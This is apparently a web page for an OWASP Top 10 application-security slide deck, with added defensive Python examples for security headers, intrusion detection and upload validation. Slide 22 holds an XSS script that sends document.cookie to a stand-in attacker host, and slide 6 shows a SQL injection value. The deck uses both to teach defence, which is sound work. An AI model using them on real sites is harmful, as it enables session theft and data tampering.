"POST" places the information in the body of the request, not in the URL
Enforce HTTPS POST for sensitive data transport
E1 HTTP Response Headers (security related)
» X-Frame-Options
» X-XSS-Protection
» X-Content-Type-Options
» Content-Security-Policy
» Access-Control-Allow-Origin
» Strict-Transport-Security (HSTS)
» Cache-Control / Pragma
X-Frame-Options
Protects you from most classes of clickjacking
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
X-Frame-Options: ALLOW-FROM <uri>   (never supported by every browser; the CSP frame-ancestors directive is the successor)
X-XSS-Protection
Use the browser's built-in XSS auditor
X-XSS-Protection: [0-1](; mode=block)?
X-XSS-Protection: 1; mode=block
(the auditor has since been removed from Chromium-based browsers and never existed in Firefox; treat this header as legacy and rely on output encoding and CSP)
X-Content-Type-Options
Fixes MIME-sniffing attacks
X-Content-Type-Options: nosniff
Originally IE-only; now honoured by all major browsers
Content Security Policy
• Anti-XSS W3C standard http://www.w3.org/TR/CSP/
• Move all inline script and style into external files
• Add the Content-Security-Policy response header to instruct the browser that CSP is in use (early Firefox builds used the experimental X-Content-Security-Policy name)
• Define a policy for the site regarding loading of content
• Chrome version 25 and later (50%)
• Firefox version 23 and later (30%)
• Internet Explorer version 10 and later (10%)
Disabling the browser cache
Add the following as part of your HTTP response:
Cache-Control: no-store, no-cache, must-revalidate
Expires: -1
E2 Application Layer Intrusion Detection
• Great detection points to start with
  – Input validation failure server side when client side validation exists
  – Input validation failure server side on non-user-editable parameters (hidden fields, checkboxes, radio buttons or select lists)
  – Forced browsing to common attack entry points, e.g. /admin/secretlogin.jsp, or a honeypot URL (a fake path listed in /robots.txt)
• Others
  – Blatant SQLi or XSS injection attacks
  – Workflow sequence abuse (e.g. multi-part form in wrong order)
  – Custom business logic (e.g. basket vs catalogue price mismatch)
OWASP AppSensor (Java)
• Project and mailing list
  https://www.owasp.org/index.php/OWASP_AppSensor_Project
• Four-page briefing, Crosstalk, Journal of Defense Software Engineering
  http://www.crosstalkonline.org/storage/issue-archives/2011/201109/201109-Watson.pdf
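The detection points above share one idea: a request that a normal browser driving your own pages cannot produce is evidence, and a few pieces of evidence from the same user justify a response. The following added example (not from the slides or the AppSensor project) encodes four of the listed detection points over a constructed stream of request records and applies a simple per-user threshold; the field lists, honeypot paths, labels and threshold are assumptions, not AppSensor's own identifiers.

```python
from collections import defaultdict

# Constructed configuration: a real app emits these records from its
# validation and routing code. Labels are descriptive, not AppSensor IDs.
HONEYPOT_PATHS = {"/admin/secretlogin.jsp", "/backup.zip"}   # listed in robots.txt, linked nowhere
CLIENT_VALIDATED = {"email", "age"}      # fields the browser already validates
NON_EDITABLE = {"role", "price"}         # hidden fields, selects, radio buttons


def detect(event):
    """Return the detection points one request record trips (possibly none)."""
    hits = []
    if event["path"] in HONEYPOT_PATHS:
        hits.append("forced-browsing-honeypot")
    for field in event.get("validation_failures", []):
        if field in NON_EDITABLE:
            hits.append("tampered-non-editable:" + field)
        elif field in CLIENT_VALIDATED:
            hits.append("bypassed-client-validation:" + field)
        # a failure on an ordinary free-text field is a typo, not evidence
    if event.get("step") is not None and event["step"] != event.get("expected_step"):
        hits.append("workflow-out-of-order")
    return hits


class AppSensor:
    """Counts detection points per user and decides on a response once a
    (constructed) threshold is crossed; in practice that response is a
    session kill, lockout or alert."""

    def __init__(self, threshold=3):
        self.threshold = threshold
        self.counts = defaultdict(int)
        self.log = []

    def feed(self, event):
        hits = detect(event)
        for h in hits:
            self.log.append((event["user"], h))
        self.counts[event["user"]] += len(hits)
        return "block" if self.counts[event["user"]] >= self.threshold else "allow"


def run(events, threshold=3):
    sensor = AppSensor(threshold)
    return [sensor.feed(e) for e in events], sensor.log


# Constructed request records for the demonstration.
SAMPLE_EVENTS = [
    {"user": "u1", "path": "/profile", "validation_failures": ["email"]},
    {"user": "u2", "path": "/checkout", "validation_failures": [], "step": 3, "expected_step": 1},
    {"user": "u1", "path": "/checkout", "validation_failures": ["price"]},
    {"user": "u1", "path": "/admin/secretlogin.jsp"},
    {"user": "u2", "path": "/profile", "validation_failures": []},
]
```

User u1 trips three different detection points across three requests and is blocked on the third; u2's single out-of-order step is logged but not acted on, which is the point of thresholds: single events are noisy, patterns are not.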
E3 Encryption in transit
• Confidentiality, integrity (in transit) and authenticity
  – Authentication credentials and session identifiers must be encrypted in transit via HTTPS (TLS)
  – Starting when the login form is rendered until logout is complete
• HTTPS configuration best practices
  – https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
• HSTS (Strict Transport Security)
  – http://www.youtube.com/watch?v=zEV3HOuM_Vw
  – Strict-Transport-Security: max-age=31536000
• Certificate pinning
  – https://www.owasp.org/index.php/Pinning_Cheat_Sheet
Strict Transport Security (HSTS)
Strict-Transport-Security: max-age=10000000
Do all of your subdomains support TLS? If so:
Strict-Transport-Security: max-age=10000000; includeSubDomains
(the header is only honoured on an HTTPS response, so the first visit over plain HTTP must be redirected, as below)
// in global.asax
protected void Application_BeginRequest(Object sender, EventArgs e)
{
    switch (Request.Url.Scheme)
    {
        case "https":
            Response.AddHeader("Strict-Transport-Security", "max-age=31536000");
            break;
        case "http":
            var path = "https://" + Request.Url.Host + Request.Url.PathAndQuery;
            Response.Status = "301 Moved Permanently";
            Response.AddHeader("Location", path);
            break;
    }
}
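The global.asax handler above and the E1 header list earlier are the same mechanism: set headers on every response, and redirect plain HTTP before anything else runs. The following added example (not from the slides) does both as a WSGI middleware in Python, so it applies to any app behind it; it only adds a header the application did not already set, so a page that must be framed by its own origin can still send SAMEORIGIN. The header values, the sample application and the driver helpers are assumptions; the CSP value in particular needs tailoring per site, and a blanket no-store cache policy is shown for brevity where you would scope it to authenticated responses.

```python
# Header set drawn from the deck's E1 and E3 slides; values are assumptions.
SECURITY_HEADERS = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("X-Frame-Options", "DENY"),
    ("X-Content-Type-Options", "nosniff"),
    ("Content-Security-Policy", "default-src 'self'"),
    ("Cache-Control", "no-store, no-cache, must-revalidate"),
    ("Pragma", "no-cache"),
    ("Expires", "-1"),
]


def security_headers(app):
    """WSGI middleware: redirect plain HTTP to HTTPS (HSTS is only learned
    from a secure response), then add every security header the wrapped
    application did not set itself."""
    def wrapped(environ, start_response):
        if environ.get("wsgi.url_scheme") != "https":
            target = "https://" + environ["HTTP_HOST"] + environ.get("PATH_INFO", "")
            if environ.get("QUERY_STRING"):
                target += "?" + environ["QUERY_STRING"]
            start_response("301 Moved Permanently",
                           [("Location", target), ("Content-Length", "0")])
            return [b""]

        def start_with_headers(status, headers, exc_info=None):
            present = {name.lower() for name, _ in headers}
            extra = [(n, v) for n, v in SECURITY_HEADERS if n.lower() not in present]
            return start_response(status, list(headers) + extra, exc_info)

        return app(environ, start_with_headers)
    return wrapped


def sample_app(environ, start_response):
    """Constructed application: its /embed page allows same-origin framing."""
    headers = [("Content-Type", "text/html")]
    if environ.get("PATH_INFO") == "/embed":
        headers.append(("X-Frame-Options", "SAMEORIGIN"))
    start_response("200 OK", headers)
    return [b"<html>hi</html>"]


def invoke(app, environ):
    """Minimal WSGI driver returning (status, header dict, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"], captured["headers"] = status, dict(headers)

    body = b"".join(app(environ, start_response))
    return captured["status"], captured["headers"], body


def environ_for(scheme, path, query=""):
    """Constructed request environment for the examples."""
    return {"wsgi.url_scheme": scheme, "HTTP_HOST": "app.example.test",
            "PATH_INFO": path, "QUERY_STRING": query, "REQUEST_METHOD": "GET"}
```

Note that the redirect response carries no HSTS header: browsers ignore the header over plain HTTP, and sending it there only invites confusion when reading logs.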
Certificate Pinning
• What is pinning
  – Pinning is a key continuity scheme
  – Detects when an imposter with a fake but CA-validated certificate attempts to act like the real server
• Two types of pinning
  – Carry around a copy of the server's public key: great if you are distributing a dedicated client-server application, since you know the server's certificate or public key in advance
  – Note the server's public key on first use (Trust On First Use, TOFU): useful when no a priori knowledge exists, as with SSH or a browser
• Plan for rotation: pin the public key (and a backup key) rather than the leaf certificate, or a routine certificate renewal locks your own clients out
• https://www.owasp.org/index.php/Pinning_Cheat_Sheet
E4 File Upload Security
• Upload verification
  – Filename and size validation + antivirus
• Upload storage
  – Use only trusted (server-generated) filenames + serve from a separate domain
• Beware of "special" files
  – "crossdomain.xml" or "clientaccesspolicy.xml" (an uploaded one would grant cross-domain access to Flash/Silverlight clients)
• Image upload verification
  – Enforce proper image size limits
  – Use image rewriting libraries
  – Set the extension of the stored image to a valid image extension
  – Ensure the detected content type of the image is safe
• Generic upload verification
  – Ensure the decompressed size of the file is below the maximum size
  – Ensure that an uploaded archive matches the expected type (zip, rar)
  – Ensure structured uploads such as an add-on follow the proper standard
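The following added example (not from the slides) implements the checks in the list above that can be decided in code: the reserved-name check, content sniffing by magic bytes with the stored extension taken from the detected type rather than the client's name, a random server-generated filename, and for archives a real decompression with a running byte cap, since the sizes declared in a zip's central directory are attacker-controlled. Magic-byte table, limits, error strings and the archive builder used for input are constructed.

```python
import io
import secrets
import zipfile

MAX_DECOMPRESSED = 1024 * 1024    # assumed limit for the demonstration
FORBIDDEN_NAMES = {"crossdomain.xml", "clientaccesspolicy.xml"}
MAGIC = {                          # leading bytes -> extension we will store
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def sniff_image(data):
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None


def check_image_upload(client_filename, data, max_bytes=2 * 1024 * 1024):
    """Returns the trusted filename to store under, or raises ValueError.
    The client's name is used for the policy check only; the stored name is
    random and carries the extension of the *detected* type."""
    base = client_filename.replace("\\", "/").split("/")[-1].lower()
    if base in FORBIDDEN_NAMES:
        raise ValueError("reserved filename")
    if len(data) > max_bytes:
        raise ValueError("too large")
    ext = sniff_image(data)
    if ext is None:
        raise ValueError("not a supported image")
    return secrets.token_hex(16) + "." + ext


def check_zip_upload(data):
    """The archive must really be a zip, its entries must not escape the
    extraction directory, and the bytes actually produced by decompression
    (not the sizes the archive claims) must stay under the limit."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        raise ValueError("not a zip archive")
    total = 0
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.filename.startswith("/") or ".." in info.filename.split("/"):
                raise ValueError("path traversal in archive entry")
            with zf.open(info) as f:
                while True:
                    chunk = f.read(65536)
                    if not chunk:
                        break
                    total += len(chunk)
                    if total > MAX_DECOMPRESSED:
                        raise ValueError("decompressed size exceeds limit")
    return total


def make_zip(entries):
    """Constructed archive builder for sample input (name -> bytes)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def rejection(fn, *args):
    """Returns the rejection reason, or None if accepted (for tests and logs)."""
    try:
        fn(*args)
        return None
    except ValueError as e:
        return str(e)
```

A 2 MiB file of zeros compresses to a few kilobytes; the streaming count stops it at the 1 MiB cap without ever holding the expanded data, which is the behaviour you want against a deliberately crafted archive.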
Thank you!
 
Web Security
Web SecurityWeb Security
Web Security
 

Ähnlich wie Application Security around OWASP Top 10

Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?ConFoo
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I thinkWim Godden
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07   application security fundamentals - part 2 - security mechanisms - data ...07   application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...appsec
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in RailsUri Nativ
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And AnishOSSCube
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentationowaspsd
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptxTrack 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptxAmazon Web Services
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Amazon Web Services
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by defaultSlawomir Jasek
 

Ähnlich wie Application Security around OWASP Top 10 (20)

Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?Security 202 - Are you sure your site is secure?
Security 202 - Are you sure your site is secure?
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Security in Node.JS and Express:
Security in Node.JS and Express:Security in Node.JS and Express:
Security in Node.JS and Express:
 
07 application security fundamentals - part 2 - security mechanisms - data ...
07   application security fundamentals - part 2 - security mechanisms - data ...07   application security fundamentals - part 2 - security mechanisms - data ...
07 application security fundamentals - part 2 - security mechanisms - data ...
 
Web Application Security in Rails
Web Application Security in RailsWeb Application Security in Rails
Web Application Security in Rails
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptx
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
OWASP San Diego Training Presentation
OWASP San Diego Training PresentationOWASP San Diego Training Presentation
OWASP San Diego Training Presentation
 
ASP.NET Web Security
ASP.NET Web SecurityASP.NET Web Security
ASP.NET Web Security
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptxTrack 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全.pptx
 
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
Track 5 Session 1_如何藉由多層次防禦搭建網路應用安全
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 

Kürzlich hochgeladen

Sending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdfSending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdf31events.com
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odishasmiwainfosol
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)jennyeacort
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxAndreas Kunz
 
Understanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM ArchitectureUnderstanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM Architecturerahul_net
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfMarharyta Nedzelska
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceBrainSell Technologies
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationBradBedford3
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...Technogeeks
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZABSYZ Inc
 

Kürzlich hochgeladen (20)

Sending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdfSending Calendar Invites on SES and Calendarsnack.pdf
Sending Calendar Invites on SES and Calendarsnack.pdf
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
Understanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM ArchitectureUnderstanding Flamingo - DeepMind's VLM Architecture
Understanding Flamingo - DeepMind's VLM Architecture
 
A healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdfA healthy diet for your Java application Devoxx France.pdf
A healthy diet for your Java application Devoxx France.pdf
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
Advantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your BusinessAdvantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your Business
 
CRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. SalesforceCRM Contender Series: HubSpot vs. Salesforce
CRM Contender Series: HubSpot vs. Salesforce
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva
 
How to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion ApplicationHow to submit a standout Adobe Champion Application
How to submit a standout Adobe Champion Application
 
What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...What is Advanced Excel and what are some best practices for designing and cre...
What is Advanced Excel and what are some best practices for designing and cre...
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZ
 

Application Security around OWASP Top 10

  • 1. Many thanks (content & inspiration) to: Jim Manico, Eoin Keary & Troy Hunt
  • 2. WARNING This is an awareness document. There are more than 10 issues. You cannot secure an application based on a top ten list.
  • 3. OWASP Top 10 - 2013
  • 5. SQL Injection
    $NEW_EMAIL = Request['new_email'];
    update users set email='$NEW_EMAIL' where id=132005;
  • 6. SQL Injection
    1. WHAT IF: $NEW_EMAIL = ';--
    2. update users set email='$NEW_EMAIL' where id=132005;
    3. update users set email='';--' where id=132005;
  • 7. Query Parameterization (PHP PDO)
    $stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");
    $stmt->bindParam(':new_email', $email);
    $stmt->bindParam(':user_id', $id);
  • 8. Query Parameterization (.NET)
    SqlConnection objConnection = new SqlConnection(_ConnectionString);
    objConnection.Open();
    SqlCommand objCommand = new SqlCommand(
        "SELECT * FROM User WHERE Name = @Name AND Password = @Password",
        objConnection);
    objCommand.Parameters.Add("@Name", NameTextBox.Text);
    objCommand.Parameters.Add("@Password", PassTextBox.Text);
    SqlDataReader objReader = objCommand.ExecuteReader();
  • 9. Query Parameterization (Java)
    String newName = request.getParameter("newName");
    String id = request.getParameter("id");
    //SQL
    PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
    pstmt.setString(1, newName);
    pstmt.setString(2, id);
    //HQL
    Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
    safeHQLQuery.setParameter("empId", id);
  • 10. Query Parameterization Failure (RoR)
    # Create
    Project.create!(:name => 'owasp')
    # Read
    Project.all(:conditions => "name = ?", name)
    Project.all(:conditions => { :name => name })
    Project.where("name = :name", :name => name)
    Project.where(:id => params[:id]).all
    # Update
    Project.update_attributes(:name => 'owasp')
  • 11. OWASP Top 10 - 2013
  • 12. Password Defenses
    Disable Browser Autocomplete
      <form AUTOCOMPLETE="off">
      <input AUTOCOMPLETE="off">
    Only send passwords over HTTPS POST
    Do not display passwords in browser: input type=password
    Store password based on need
      – Use a salt (de-duplication)
      – SCRYPT/PBKDF2 (slow, performance hit, easy)
      – HMAC (requires good key storage, tough)
  • 13. Password Storage
    1) Do not limit the type of characters or length* of user password
      – Limiting passwords to protect against injection is doomed to failure
      – Use proper encoder and other defenses described instead
  • 14. Password Storage
    2) Use a cryptographically strong credential-specific salt
      – Protect ([salt] + [password]);
      – Use a 32 char / 64 char salt (may depend on protection function)
      – Do not depend on hiding / splitting / otherwise obscuring the salt
  • 15. Password Storage
    3) Impose difficult verification on attacker ONLY
      – HMAC-SHA256 ([private key], [salt] + [password])
      – Protect the key as any private key
      – Store key outside the credential store
      – Improvement over (solely) salted schemes; relies on proper key creation & management
  • 16. Password Storage
    4) Impose difficult verification on both (impacts attacker more than defender)
      – pbkdf2([salt] + [password], c=10,000,000);
      – PBKDF2 when FIPS certification or enterprise support on many platforms required
      – Scrypt when resisting hardware accelerated attacks is more important
  • 17. Basic MFA Considerations
    • Where do you send the token?
      – Email (worst – yet, better than none!)
      – SMS (ok)
      – Mobile native app (good)
      – Dedicated token (great)
      – Printed Tokens (interesting)
    • How do you handle thick clients?
      – Email services, for example
      – Dedicated and strong per-app passwords
  • 18. Basic MFA Considerations
    • How do you handle unavailable MFA devices?
      – Printed back-up codes
      – Fallback mechanism (like email)
      – Call-in center
    • How do you handle mobile apps?
      – When is MFA not useful in mobile app scenarios?
  • 19. "Forgot Password" design
    1. Require identity questions: last name, account number, email, DOB; enforce lockout policy
    2. Ask one or more good security questions (https://www.owasp.org/index.php/Choosing_and_Using_Security_Questions_Cheat_Sheet)
    3. Send the user a randomly generated token via out-of-band email, SMS or hardware / software token generator
    4. Verify code in same web session; enforce lockout policy
    5. Change password; enforce password policy
  • 20. OWASP Top 10 - 2013
  • 22. Anatomy of an XSS Attack
    <script>
      var badURL = 'https://evileviljim.com/somesite/data=' + document.cookie;
      var img = new Image();
      img.src = badURL;
    </script>
    <script>document.body.innerHTML='<blink>CYBER IS COOL</blink>';</script>
  • 23. Impact of XSS
    – Session Hijacking
    – Site Defacement
    – Network Scanning
    – Undermining CSRF Defenses
    – Site Redirection/Phishing
    – Load of Remotely Hosted Scripts
    – Data Theft
    – Keystroke Logging
    – Attackers using XSS more frequently
  • 24. XSS Prevention (.NET)
    • WebForms/WebForms View Engine: <%=Server.HtmlEncode(data)%>
    • WebForms v4.0+: <%: data %>
    • MVC3+ Razor View Engine: @data
    • Data Binding in Web Forms v4 and below: <%#Server.HtmlEncode(Eval("property"))%>
    • Data Binding in v4.5: <%#: Item.Property %>
    • Better: ASP.Net 3.5 and below use AntiXss library directly
      Microsoft.Security.Application.Encoder.HtmlEncode(message)
  • 25. XSS Prevention (.NET)
    • ASP.Net 4 (WebForms and MVC)
